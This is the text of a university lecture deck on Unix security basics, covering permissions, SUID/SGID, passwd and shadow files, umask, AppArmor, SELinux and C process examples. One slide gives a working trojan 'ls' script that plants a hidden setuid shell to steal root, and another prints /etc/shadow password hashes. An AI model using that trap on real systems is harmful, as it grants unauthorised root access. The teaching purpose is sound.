Lecture 4 unix security basics
This presentation is the property of its rightful owner.
Sponsored Links
1 / 93

Lecture 4: Unix Security Basics PowerPoint PPT Presentation


  • 68 Views
  • Uploaded on
  • Presentation posted in: General

Lecture 4: Unix Security Basics. Prof. Guntis Barzdins Asist. Girts Folkmanis Lekt. Leo Trukšāns University of Latvia. U1 BIND Domain Name System U2 Remote Procedure Calls (RPC) U3 Apache Web Server U4 General UNIX Authentication Accounts with No Passwords or Weak Passwords

Download Presentation

Lecture 4: Unix Security Basics

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Lecture 4 unix security basics

Lecture 4: Unix Security Basics

Prof. Guntis Barzdins

Asist. Girts Folkmanis

Lekt. Leo Trukšāns

University of Latvia


Top unix vulnerabilities

U1 BIND Domain Name System

U2 Remote Procedure Calls (RPC)

U3 Apache Web Server

U4 General UNIX Authentication Accounts with No Passwords or Weak Passwords

U5 Clear Text Services

U6 Sendmail

U7 Simple Network Management Protocol (SNMP)

U8 Secure Shell (SSH)

U9 Misconfiguration of Enterprise Services NIS/NFS

U10 Open Secure Sockets Layer (SSL)

Top UNIX Vulnerabilities

Source: http://www.sans.org/top20/#threats


Favourite tcp ports

20 FTP (data)

21 FTP (control)

23 Telnet

25 SMTP (mail)

70 Gopher

79 Finger

80 HTTP also 8000 or 8001 or 8080

110 Pop3

119 NNTP (news)

143 Imap

7-19 echo, discard, daytime, chargen, netstat

22 SSH

42 wins

53 dns

111 sun rpc

113 identd

123 ntp

135 loc-srv/epmap – used to attack wintel

137-139 netbios

161 snmp

512-517 rexec, rlogin, rsh, talk, syslog, who

635 mountd – Linux

2049 nfs

6670 Deepthroat

31337 BackOrifice

Favourite TCP Ports


No system is perfectly secure but still we need security

No system is perfectly secure, but still we need security

  • A number of toolkits exist that allow total amateurs to become holy terrors.

  • The good news is that if you can beat the popular intrusion toolkits, 90 percent of the bad guys will go bother somebody else who's less secure.


Protection

Protection

  • Operating system consists of a collection of objects, hardware or software

  • Each object has a unique name and can be accessed through a well-defined set of operations.

  • Protection problem - ensure that each object is accessed through correct set of operations and only by those processes that are allowed to do so.


Unix security basics

UNIX Security Basics

  • Permissions

  • UID

  • GID

  • Superuser

  • SUID, SGID

  • Sticky bit

  • Umask

  • Filesystem restrictions

  • Advanced: Systrace, Veriexec, iptables, etc.


Domain implementation in unix

Domain Implementation in UNIX

  • Two domain groups

    • User

    • Superuser (can do everything, UID=0)

  • User domain group

    • Domain = user-id (UID)

    • Domain switch accomplished via file system.

      • Each file has associated with it a domain bit (setuid bit = SUID bit).

      • When file is executed and setuid = on, then effective user-id is set to owner of the file being executed. When execution completes user-id is reset (exit() for child process ).


Subjects and objects

Subjects and Objects

  • Each subject (process) and object (file, socket, etc) has a 16-bit UID.

    • Each object also has a 16-bit GID and each subject has one or more GIDs.

  • Objects have access control lists that specify read, write, and execute permissions for user, group, and world.

  • Super-users (uid=0 root) can do anything.


Subjects and objects1

Subjects and Objects

Objects = files (regular and devices /dev)

Subjects = processes(effective UID, GID counts)


Inodes

inodes

  • inodes contain a lot of information about a file

    • mode and type of file

    • number of links to the file

    • owner's UID

    • owners GID

    • number of bytes in file

    • times (last accessed, modified, inode changed)

    • physical disk addresses (direct and indirect blocks)

    • number of blocks

    • access information


Unix file system ufs structure

Unix File System (UFS) Structure


Directory

Directory

  • Under UNIX directories are special (OS writable only) files.

  • The directory file is an unsorted linked list of filenames to file-inode (attributes and location of file on hard disk)

  • Directory size will always increase to be large enough to hold all the file entries. If the number of files latter shrinks the directory size WILL NOT!


Lecture 4 unix security basics

ls -l

> ls -l foo

-rw-rw---- 1 hollingd grads 13 Jan 10 23:05 foo

size

permissions

name

owner

group

time


File time attributes

File Time Attributes

  • Time Attributes:

    • when the file was last changedls -l

    • when the file was created*ls -lc

    • when the file was last read(accessed)ls -ul

      *actually it’s the time the file status in the directory last changed (e.g. file renamed).


File types in unix

File Types In Unix

All Files

Text: Readable characters

Binary: Uses all characters

Documents, etc.

Directories

Source: Readable Programs

Programming Language: Interpreted or Compiled

Compiler

Machine Code: Directly executed

Shell scripts: Interpreted by shell

Executable Files


Types of files

Types of Files

  • Regular Files

    • binary

      • GIF, JPEG, Executable etc.

    • text

      • scripts, program source code, documentation

    • Supports sequential and random access


Types of files cont

Types of Files (cont.)

  • Directory

    • Can contain ANY kind of files

      . (Dot)The special name for the current directory.

      ..(Dot) (Dot)The special name for the directory above the current directory.

  • Device File

    • Allows programs to communicate with hardware.

    • Kernel modules handle device management.


Types of files cont1

Types of Files (cont.)

  • Device Files (cont.)

    • Character Device

      • Accepts a stream of characters, without regard to any block structure.

      • It is not addressable, therefore no seek operation

    • Block Device

      • Information stored in fixed-sized block

      • It is addressable, therefore seek operation is possible.


Types of files cont2

Types of Files (cont.)

  • UNIX Domain Sockets (BSD)

    • sockets that are local to a particular host and are referenced through a file system object rather than a network port.

    • X windows

  • Named Pipe

    • Allow processes to communicate with each other.


Types of files cont3

Types of Files (cont.)

  • Hard links

    • Linking files by reference

    • System maintains a count of the number of links

    • Does not work across file systems.

  • Soft links

    • Linking files by name

    • No counter is maintained

    • Work across file system


From man ln

From “man ln”

  • There are two concepts of `link' in Unix, usually called hard linkand soft link

    • A hard link is just a name for a file. (And a filecan have several names. It is deleted from disk only when the lastname is removed. The number of names is given by ls(1). There isno such thing as an `original' name: all names have the same status.

    • A soft link (or symbolic link, or symlink) is an entirely different animal: it is a small special file that contains a pathname.


Creating a link

Creating a Link

  • Create a link directory by typing the following command from your home directory:

    % ln -s /home/faculty/ostic/prof myprof

  • You only need to create this link once.It will appear as a subdirectory in your home directory structure every time you log on to the system.

soft link


Disk vs filesystem

bin

etc

users

tmp

usr

Disk vs. Filesystem

  • The entire hierarchy can actually include many disk drives.

    • some directories can be on other computers

/

hollid2

scully


Disk mount options

Disk mount options

  • Override individual file permissions

  • A major security tool in Unix

fdisk -l

mount /dev/hdb1 /media/new_disk -t ext3 –o ro,nosuid

unmount /media/new_disk


File permission s

File permissions

File type

- : plain file

d : directory

c : character device (tty, printer)

b : block device (disk, CD-ROM)

l : symbolic link

s : socket

=, p : FIFO

Access granted to

others

-rwxr--r--

Access granted to

group member

Access granted to owner

r : read / w : write / x : execute


Permissions for files

Permissions for Files

  • If you have read permission for a file, you can view its contents.

  • If you have write permission for a file, you can alter its contents.

  • If you have execute permission for a file, you can run the file as a program.


Permissions for directories

Permissions for Directories

  • If you have read permission for a directory, you can list the contents of the directory.

  • If you have write permission for a directory, you can create or remove files or directories inside that directory.

  • If you have execute permission for a directory, you can change to this directory using the cd command, or use it as part of a pathname.


Suid sgid sticky bits

SUID/SGID/sticky bits

  • SUID (set uid)

    • Processes are granted access to system resources based on user who owns the file.

  • SGID (set gid)

    • (For file) Same with SUID except group is affected.

    • (For directory) Files created in that directory will have their group set to the directory's group.

  • sticky bit

    • If set on a directory, then a user may only delete files that he owns or for which he has explicit write permission granted, even when he has write access to the directory. (e.g. /tmp )


File permissions

File Permissions

  • File Permissions (ex: rw-r--r--)

    • owner: rw-, group: r--, others: r--

    • r: read, w: write, x: execute

  • When a process executes, it has four values related to file permission

    • a real user ID, an effective user ID

    • a real group ID, an effective group ID

  • When you login, your login shell process’ values are your user ID and group ID


Effective user and group id

Effective User and Group ID

  • A process’ effective user ID

    • depends on who executes the process, not who owns the executable

    • E.g., if you run passwd (owned by root), the effective user ID is your ID, not root; then how can it update /etc/passwd file owned by root ?

    • Two special file permissions

      • “set user ID” (SUID) and “set group ID”(GUID)

      • When an executable with set user ID permission is executed, the process’ effective user ID becomes that of executable; the real user ID is unaffected

      • File permission of /bin/passwd is r-sr-sr-x


Real uids

Real uids

  • The uid of the user who started the program is used as its real uid.

  • The real uid affects what the program can do (e.g. create, delete files).

  • For example, the uid of /usr/bin/vi is root:

    • $ls -alt /usr/bin/vilrwxrwxrwx 1 root root 20 Apr 13...

  • But when I use vi, its real uid is dkl (not root), so I can only edit my files.


Effective uids

Effective uids

  • Programs can change to use the effective uid

    • the uid of the program owner

    • e.g. the passwd program changes to use its effective uid (root) so that it can edit the /etc/passwd file

    • SUID bit enables this functionality


Real and effective group ids

Real and Effective Group-ids

  • There are also real and effective group-ids.

  • Usually a program uses the real group-id(i.e. the group-id of the user).

  • Sometimes useful to use effective group-id(i.e. group-id of program owner):

    • e.g. software shared across teams

  • SGID bit enables this functionality


Sample setuid scenario

Sample SETUID Scenario

  • /dev/lp is owned by root with protection rw-------

    • This is used to access the printer

  • /bin/lp is owned by root withrwsr-xr-x (with SETUID=1)

  • User A issues a print command

  • Shell (running with A’s UID and GID) interprets the command and forks off a child process, say, P

  • Process P has the same UID/GID as user A

  • Child process P executes exec(“/bin/lp”,…)

  • Now P’s domain changes to root’s UID

  • Consequently, /dev/lp can be accessed to print

  • When /bin/lp terminates so does P

  • Parent shell never got the access to /dev/lp


File system tips

File system tips

  • Turning off SUID / SGID in mounted file system

    • use nosuid (and nodev if possible) when mounting remote file system or allowing users to mount floppies or CD-ROMs

  • Finding SUID and SGID Files

    • # find / \( -local -o -prune \) \( -perm -004000 -o -perm -002000 \) -type f -print

    • ( xdev can be used in place of local/prune)


Unix accounts and the filesystem

Unix Accounts and the Filesystem


Unix accounts

Unix Accounts

  • To access a Unix system you need to have an account.

  • Unix account includes:

    • username and password

    • userid and groupid

    • home directory

    • shell


Creating user accounts

Creating user accounts

  • useradd or adduser scripts

  • manually

    • edit /etc/passwd, etc/shadow, etc/group

      • remember to lock these files while editing - vipw

    • run “passwd [user]”

    • create home directory

      • chown, chgrp, chmod

      • copy defaults (e.g umod) from

        • /etc/skel

        • /etc/profile


Username

username

  • A username is (typically) a sequence of alphanumeric characters of length no more than 8.

  • username the primary identifying attribute of your account.

  • username is (usually) used as a part of email address

  • the name of your home directory is usually related to your username.


Password

password

  • a password is a secret string that only the user knows (not even the system knows!)

  • When you enter your password the system calculates a hash (one-way) function and compares it to a stored string.

  • passwords are (usually) no less than 8 characters long.

  • It's a good idea to include numbers and/or special characters (don't use an english word!)


Userid

userid

  • a userid is a number (a 16-bit integer) that identifies a Unix account. Each userid is unique.

  • It's easier (and more efficient) for the system to use a number than a string like the username.

  • You don't need to know your userid!


Unix groups and groupid

Unix Groups and groupid

  • Unix includes the notion of a "group" of users.

  • A Unix group can share files and active processes.

  • Each account is assigned a "primary" group.

  • The groupid is a number that corresponds to this primary group.

  • A single account can belong to many groups (but has only one primary group).


Home directory

Home Directory

  • A home directory is a place in the file system where the account files are stored.

  • A directory is like a Windows folder (more on this later).

  • Many unix commands and applications make use of the account home directory (as a place to look for customization files).


Additional password security

Additional Password Security

  • Later versions of Unix have improved the security for password encryption as follows:

    • Passwords no longer restricted to 8 characters

    • Use MD5 instead of DES; gives 128-bit output

    • Use “salt”

  • Furthermore, the encrypted (hashed) password is removed from the /etc/passwd file and instead is placed in /etc/shadow

    • Restricted access to /etc/shadow – no requirement for it to be world-readable; only readable by Root

    • Much more difficult to launch off-line (dictionary) attack

    • /etc/shadow contains additional password information (number of days before expiry, etc)


Passwd shadow group files

passwd, shadow, group files

tikai “wheel” grupa var su uz root;

skat /etc/pam.d/

unix etc # ls -l passwd shadow group

-rw-r--r-- 1 root root 705 Sep 23 15:36 group

-rw-r--r-- 1 root root 1895 Sep 24 18:20 passwd

-rw------- 1 root root 634 Sep 24 18:22 shadow

unix etc #

unix root # more /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/bin/false

daemon:x:2:2:daemon:/sbin:/bin/false

adm:x:3:4:adm:/var/adm:/bin/false

lp:x:4:7:lp:/var/spool/lpd:/bin/false

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

...

guest:x:405:100:guest:/dev/null:/dev/null

nobody:x:65534:65534:nobody:/:/bin/false

girtsf:x:1000:100::/home/girtsf:/bin/bash

dima:x:1001:100::/home/dima:/bin/bash

guntis:x:1002:100::/home/guntis:/bin/bash

students:x:1003:100::/home/students:/bin/bash

unix root #

unix root # more /etc/group

root::0:root

bin::1:root,bin,daemon

daemon::2:root,bin,daemon

sys::3:root,bin,adm

adm::4:root,adm,daemon

tty::5:girtsf

disk::6:root,adm

lp::7:lp

mem::8:

kmem::9:

wheel::10:root,girtsf

floppy::11:root

mail::12:mail

...

users::100:games,girtsf

nofiles:x:200:

qmail:x:201:

postfix:x:207:

postdrop:x:208:

smmsp:x:209:smmsp

slocate::245:

portage::250:portage

utmp:x:406:

nogroup::65533:

nobody::65534:

unix root #

unix root # more /etc/shadow

root:$1$VlYbWsrd$GUs2cptio.rKlGHgAMBzr.:12684:0:::::

halt:*:9797:0:::::

...

guest:*:9797:0:::::

nobody:*:9797:0:::::

girtsf:$1$u6UEWKT2$w5K28n2iAB2wNWtyPLycP1:12684:0:99999:7:::

dima:$1$BQCdIBdV$xzzlj4s8XT6L9cLAmcoV50:12684:0:99999:7:::

guntis:$1$fiJF/0BT$Py9JiQQL6icajjQVyMZ7//:12684:0:99999:7:::

students:$1$wueon8yh$nLpUpNOKr8yTYaEnEK6OJ1:12685:0:99999:7:::

unix root #


Users and ownership etc passwd

Users and Ownership: /etc/passwd

  • Every File is owned by one of the system’s users – identity is represented by the user-id (UID)

  • Password file assoicate UID with system users.

    gates:x:65:20:H. Gates:/home/gates:/bin/ksh

command interpreter(shell)

home directory

“real” name

group ID

user ID

[encrypted password]

login name


Etc group

/etc/group

  • Information about system groups

    faculty:x:23:maria,eileen,dkl

list of group members

group ID

[encrypted group password]

group name


Shell

Shell

  • A Shell is a unix program that provides an interactive session - a text-based user interface.

  • When you log in to a Unix system the program you initially interact with is your shell.

  • There are a number of popular shells that are available.


Popular shells

Popular Shells

shBourne Shell

ksh Korn Shell

csh C Shell

bash Bourne-Again Shell


Lecture 4 unix security basics

to new files

$ umask 0174

$ mkdir foo

$ touch bar

$ ls -l

drw-----wx 2 dave dave 512 Sep 1 20:59 foo

-rw-----w- 1 dave dave 0 Sep 1 20:59 bar


Umask calculations 2

umask: Calculations (2)

  • If you want a file permission of 644 (by default, without manually executing chmod) on a regular file, the umask would need to be 022.

    Default Mode666

    umask -022

    New File Mode644

  • Bit level: new_mask = mode & ~umask

    umask = 000010010 = ---rw-rw = 0022

    ~umask = 111101101

    mode= 110110110 = rw-rw-rw = 0666

    new_mask = 111100100 = rw------ = 0600


Startup files

Startup files

sh,ksh:

/etc/profile (system defaults) ~/.profile

bash:

~/.bash_profile

~/.bashrc

~/.bash_logout

csh:

~/.cshrc

~/.login

~/.logout


Toyshell c

toyshell.c

int main (void){

char cmd[MAXLINE];

char *cmdp;

char *av[MAXARG];

int i;

while(1){

printf("$toyshell$> ");

fgets(cmd,sizeof(cmd),stdin);

if(strcmp(cmd,"env\n")==0){

env();

} else if(strcmp(cmd,"exit\n")==0){

exitsh(0);

} else {

cmdp=cmd;

for(i=0;i<MAXARG;i++){

av[i]=strtok(cmdp," \t\n");

cmdp=NULL;

}

execute(av);

}

}

return(0);

}

#include <stdlib.h>

#include <stdio.h>

#include <sys/types.h>

#include <sys/wait.h>

#include <unistd.h>

#include <signal.h>

#define MAXLINE 200

#define MAXARG 20

extern char **environ;

void env(void){

int i;

for(i=0;environ[i]!=NULL;i++){

printf("%s\n",environ[i]);

}

}

void exitsh(int status){

_exit(status);

}

void execute(char *arg[]){

pid_t pid;

int status;

pid=fork();

if(pid>0){

wait(&status);

} else if (pid==0) {

execvp(arg[0],arg);

printf("Komanda nav atrasta\n");

exitsh(0);

} else {

printf("Kluda fork() sistemas izsaukuma\n");

}

}


Toyshell palai ana

“toyshell” palaišana

# /usr/bin/gcc toyshell.c

# cc toyshell.c

# ./a.out

$toyshell$> env

USER=root

HOME=/root

TERM=vt100

PATH=/root/bin:/usr/local/bin:/bin:/usr/bin

SHELL=/bin/sh

$toyshell$> ps

PID TTY TIME CMD

126 co 0:00 -sh

95 c1 0:00 getty

435 p1 0:00 ./a.out

436 p1 0:00 ps

$toyshell$> exit

#


Q a who and how choose how to execute shell and or object binary file

Q&A: Who and how choose how to execute shell and/or object binary file ?

man execve

execve(const char *path, char *const argv[], char *const envp[]);

execve() transforms the calling process into a new process. The new process is constructed from an ordinary file, whose name is pointed to by path, called the new processfile. This file is either an executable object file, or a file of data for an interpreter.

An executable object file consists of an identifying header, followed by pages of data representing the initial program (text) and initialized data pages. Additional pages may be specified by the header to be initialized with zero data;

An interpreter file begins with a line of the form:

#! interpreter [arg]

When an interpreter file is execve(Ap, d), the system execve(Ap, s) runs the specified interpreter. If the optional arg is specified, it becomes the first argument to the interpreter, and the name of the originally execve(Ap, d) file becomes the second argument; otherwise, the name of the originally execve(Ap, d) file becomes the first argument. The original arguments are shifted over to become the subsequent arguments. The zeroth argument, normally the name of the execve(Ap, d) file, is left unchanged

....


Q a who and how choose how to execute shell and or object binary file1

Q&A: Who and how choose how to execute shell and/or object binary file ?

/etc/magic:

...

0 string \177ELF ELF

>4 byte 0 invalid class

>4 byte 1 32-bit

>4 byte 2 64-bit

>5 byte 0 invalid byte order

>5 byte 1 LSB

>>16 leshort 0 no file type,

>>16 leshort 1 relocatable,

>>16 leshort 2 executable,

>>16 leshort 3 shared object,

...

# bash shell magic, from Peter Tobias ([email protected])

0 string #!/bin/bash Bourne-Again shell script text

0 string #!\ /bin/bash Bourne-Again shell script text

0 string #!/usr/local/bin/bash Bourne-Again shell script text

0 string #!\ /usr/local/bin/bash Bourne-Again shell script text

# generic shell magic

0 string #!\ / a

>3 string >\0 %s script text

0 string #!/ a

>2 string >\0 %s script text

0 string #!\ commands text

>3 string >\0 for %s

...

0 string :\ shell archive or commands for antique kernel text

0 string #!/bin/sh Bourne shell script text

0 string #!\ /bin/sh Bourne shell script text

0 string #!/bin/csh C shell script text

0 string #!\ /bin/csh C shell script text

...


Logging in

Logging In

  • To log in to a Unix machine you can either:

    • sit at the console (the computer itself)

    • access via the net (using telnet, rsh, ssh, kermit, or some other remote access client).

  • The system prompts you for your username and password.

  • Usernames and passwords are case sensitive!


Session startup

Session Startup

  • Once you log in, your shell will be started and it will display a prompt.

  • When the shell is started it looks in your home directory for some customization files.

    • You can change the shell prompt and a bunch of other things by creating customization files (umask etc.)


Your home directory

Your Home Directory

  • Every Unix process* has a notion of the “current working directory”.

  • Your shell (which is a process) starts with the current working directory set to your home directory.

    *A process is an instance of a program that is currently running.


Interacting with the shell

Interacting with the Shell

  • The shell prints a prompt and waits for you to type in a command.

  • The shell can deal with a couple of types of commands:

    • shell internals - commands that the shell handles directly.

    • External programs - the shell runs a program for you.


Who is superuser

Who is superuser ?

  • UID of 0

  • Any username can be the superuser.

  • Normal security checks and constraints are ignored for the superuser.

  • Superuser is not for casual use.

    • Do not login as superuser, use ‘/bin/su’ with “-” option instead.


Simple trap to steal superuser

Premise

Root’s PATH starts with “.”

Contents of shell script ‘ls’

#!/bin/sh

cp /bin/sh ./junk/.ss

chmod 4555 ./junk/.ss

rm –f $0

exec /bin/ls [email protected]}

Set a trap

% cd

% chmod 700 .

% touch ./-f

To do is just say to administrator. “I have a funny file in my directory I can’t seem to delete.”

Simple trap to steal superuser


Good root practice

Good root practice

unix root # which ls

/bin/ls

unix root # ls -al `which ls`

-rwxr-xr-x 1 root root 79360 Jul 18 08:03 /bin/ls

unix root #

Do not start root PATH with “.”


Apparmor

AppArmor

  • AppArmor is a kernel enhancement to confine programs to a limited set of resources.

  • AppArmor's unique security model is to bind access control attributes to programs rather than to users.

  • AppArmor confinement is provided via profiles loaded into the kernel.


Apparmor1

AppArmor

  • AppArmor can operate in two modes: enforcement, and complain.

  • Profiles are applied to a process at exec(3) time.

  • AppArmor also restricts what privileged operations a confined process may execute, even if the process is running as root.


Apparmor2

AppArmor

  • # cat /etc/apparmor.d/usr.bin.tail

  • /usr/bin/tail {

  • /lib/** rm,

  • /etc/group r,

  • }

  • # enforce /usr/bin/tail

  • Setting /usr/bin/tail to enforce mode.

  • # tail /etc/passwd

  • tail: cannot open `/etc/passwd' for reading: Permission denied

  • # tail /etc/group

  • rtkit:x:117:

  • ...

  • # complain /usr/bin/tail

  • Setting /usr/bin/tail to complain mode.


Selinux

SELinux

  • NSA Security-Enhanced Linux (SELinux) is an implementation of a flexible mandatory access control (MAC) architecture in the Linux operating system.

  • The /etc/selinux/config configuration file controls whether SELinux is enabled or disabled, and if enabled, whether SELinux operates in permissive mode or enforcing mode.

  • At present, two kinds of SELinux policy exist: targeted and strict.


Selinux1

SELinux

  • When a subject, (for example, an application), attempts to access an object (for example, a file), the policy enforcement server in the kernel checks an access vector cache (AVC), where subject and object permissions are cached.

  • If a decision cannot be made based on data in the AVC, the request continues to the security server, which looks up the security context of the application and the file in a matrix. Permission is then granted or denied, with an “avc: denied” message detailed in /var/log/messages if permission is denied.


Selinux piem ri

SELinux piemēri

  • /usr/sbin/setenforce Permissive

  • /usr/sbin/setenforce Enforcing

  • # /usr/sbin/getsebool httpd_can_network_connect

  • httpd_can_network_connect --> off

  • # /usr/sbin/setsebool -P httpd_can_network_connect=1

  • # /usr/sbin/getsebool httpd_can_network_connect

  • httpd_can_network_connect --> on

  • # /usr/sbin/setsebool -P ftp_home_dir on

  • chcon -v -R --type=httpd_sys_content_t /var/citswww/*


Vingrin jums no 2006

Vingrinājums no 2006

  • Katram instalēt atšķirīgu* Unix paveidu

  • Pētījumā (aptuveni 5-10 lpp) aprakstīt gūto pieredzi:

    • Ar ko šī Unix versija atšķiras no citām, kāpēc to izvēlējāties

    • Unix instalācijas process

      • Galveno soļu screenshoti

      • Svarīgākās konfigurācijas opcijas, jūsu izvēle

      • Izveidot lietotāju “lapsa”, pārbaudīt ka var pieslēgties

    • Aplikācijas “toyshell” kompilācija, uzlabošana

      • Nokompilēt un pārbaudīt “toyshell” darbību

      • Papildināt “toyshell” funkcionalitāti (help, cd, ctrl/D, setenv,...)**

      • Panākt lai lietotājs “lapsa” pieslēdzoties nonāk jūsu “toyshell” un var tajā veikt sakarīgas darbības

* - vairāku vienādu Unix paveidu gadījumā, vērtējums būs stingrāks

** - vairāk signāli, systemcall vērtējumu uzlabos


Security in unix

Security in UNIX

cp a.out /bin/toyshell

chmod 777 /bin/toyshell

mkdir /home/lapsa

passwd lapsa

gunzip –c Unix.tar.gz | tar –xvf -


Environment variables

Environment variables

#include <stdlib.h>

extern char **environ;

int main(int argc,char *argv[]) {

int i;

for (i=0;environ[i]!=NULL;i++){

printf("%s\n",environ[i]);

}

return(0);

}


Environment variables1

Environment variables

#include <stdlib.h>

int main(int argc,char *argv[]){

if (argc==1){

printf("Nav neviena argumenta\n");

return(1);

} else if (argc>2) {

printf("argc > 2\n");

return(1);

} else {

printf("%s=%s",argv[1],getenv(argv[1]));

}

return(0);

}


Environment variables2

Environment variables

#include <stdlib.h>

extern char **environ;

int main(int argc,char *argv[]){

int i;

if (argc==1){

printf("Nav neviena argumenta\n");

return(1);

} else if (argc>2) {

printf("argc > 2\n");

return(1);

} else {

putenv(argv[1]);

}

for (i=0;environ[i]!=NULL;i++){

printf("%s\n",environ[i]);

}

return(0);

}


Environment variables3

Environment variables

#include <stdlib.h>

extern char **environ;

int main(int argc,char *argv[]){

int i;

if (argc==1){

printf("Nav neviena argumenta\n");

return(1);

} else if (argc>2) {

printf("argc > 2\n");

return(1);

} else {

unsetenv(argv[1]);

}

for (i=0;environ[i]!=NULL;i++){

printf("%s\n",environ[i]);

}

return(0);

}


Lecture 4 unix security basics

Exec

#include <stdlib.h>

int main(int argc,char *argv[]){

printf("execl() system call\n");

execl("/bin/echo","echo","Test1.1","Test1.2",NULL);

return(0);

}


Lecture 4 unix security basics

Exec

#include <stdlib.h>

#include <stdio.h>

int main(int argc,char *argv[]){

printf("execl() system call testing\n");

fflush(stdout);

execl("/bin/echo","echo","Test1.1","Test1.2",NULL);

return(0);

}


Lecture 4 unix security basics

Fork

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>

int main(int argc,char *argv[]){

pid_t pid;

printf("start test\n");

pid=fork();

printf("Return value %d\n",pid);

sleep(1);

return(0);

}


Lecture 4 unix security basics

Fork

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>

#include <errno.h>

pid_t pid;

int main(int argc,char *argv[]){

pid=fork();

if(pid==-1) {

printf("Error creating new process\n");

return(errno);

}

if(pid==0){

printf("Child\n");

sleep(10);

return(0);

}

if(pid!=0){

wait();

printf("Parent\n");

return(0);

}

}


Lecture 4 unix security basics

Fork

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>

#include <errno.h>

pid_t pid;

int main(int argc,char *argv[]){

pid=fork();

if(pid==-1) {

printf("Error creating new process\n");

return(errno);

}

if(pid==0){

printf("Child\n");

execl("/bin/ls","ls","-l","/",NULL);

sleep(10);

return(0);

}

if(pid!=0){

wait();

printf("Parent\n");

return(0);

}

}


Signal

Signal

#include <stdlib.h>

#include <signal.h>

int i;

void sighandler(){

printf("Catched signal\n");

printf("Reset i value\n");

i=0;

}

int main(int argc,char *argv){

struct sigaction sact;

sact.sa_handler=sighandler;

sigaction(SIGINT,&sact,NULL);

for(i=0;;i++){

printf("%d\n",i);

sleep(3);

}

return(0);

}


Signal1

Signal

#include <stdlib.h>

#include <signal.h>

int i;

void sighandler(){

printf("SIGHUP signal\n");

printf("Reset i value\n");

i=0;

}

int main(int argc,char *argv){

struct sigaction sact1;

struct sigaction sact2;

sact1.sa_handler=SIG_IGN;

sact2.sa_handler=sighandler;

sigaction(SIGINT,&sact1,NULL);

sigaction(SIGHUP,&sact2,NULL);

for(i=0;;i++){

printf("%d\n",i);

sleep(3);

}

return(0);

}


Signal2

Signal

#include <stdlib.h>

#include <signal.h>

int i;

void sighandler(){

printf("SIGHUP signal\n");

printf("Reset i value\n");

i=0;

}

int main(int argc,char *argv){

struct sigaction sact2;

sact2.sa_handler=sighandler;

sigaction(SIGHUP,&sact2,NULL);

for(i=0;;i++){

printf("%d\n",i);

sleep(1);

if(i>=10){

if(raise(SIGHUP)!=0){

printf("Problem send signal to current process\n");

}

}

}

return(0);

}


  • Login